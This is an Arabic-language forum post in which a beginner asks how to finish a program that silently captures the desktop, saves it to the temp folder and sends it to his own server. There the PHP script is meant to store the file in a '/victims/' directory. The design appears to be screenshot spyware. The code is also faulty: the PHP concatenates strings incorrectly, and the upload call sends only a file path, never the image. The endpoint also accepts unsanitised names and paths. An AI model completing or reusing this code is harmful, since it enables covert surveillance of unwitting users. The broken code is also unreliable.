السلام عيكم ورحمة الله
اخواني انا جديد في البرمجة وفي هذا المنتدى
يا ريت تساعدوني

انا قمت ببرمجة برنامج يقوم بالتقاط صورة لصطح المكتب ووضعها في ملف حسب ارادة المستخدم لاكن المشكلة لا اعرف كيف ارفعها لموقع انا امتلك هذا الموقع
يعني انا فكرت استخدم ال php فقمت ببرمجة هذا الكود php:
PHP كود :
<?php
$path = $_GET['path'];
$name = $_GET['name'];
move_uploaded_file($_FILES[$path]["tmp_name"],"/victims/"+ name);
?>
كود :
Dim bounds As Rectangle
Dim screenshot As System.Drawing.Bitmap
Dim graph As Graphics
bounds = Screen.PrimaryScreen.Bounds
screenshot = New System.Drawing.Bitmap(bounds.Width, bounds.Height, System.Drawing.Imaging.PixelFormat.Format32bppArgb)
graph = Graphics.FromImage(screenshot)
graph.CopyFromScreen(bounds.X, bounds.Y, 0, 0, bounds.Size, CopyPixelOperation.SourceCopy)
PictureBox1.Image = screenshot
TextBox1.Text = (Path.GetTempPath)
PictureBox1.Image.Save(TextBox1.Text + "screanshot.bmp")
كود الرفع :
كود :
Dim upload As New WebClient
upload.DownloadString("https://xxx.xxx.com/sender/screenshot.php?name=" & "kasp3r" + "&path=" + TextBox1.Text + "screanshot.bmp")
الله يجزيكم كل خير وساعدكم على نشر العلم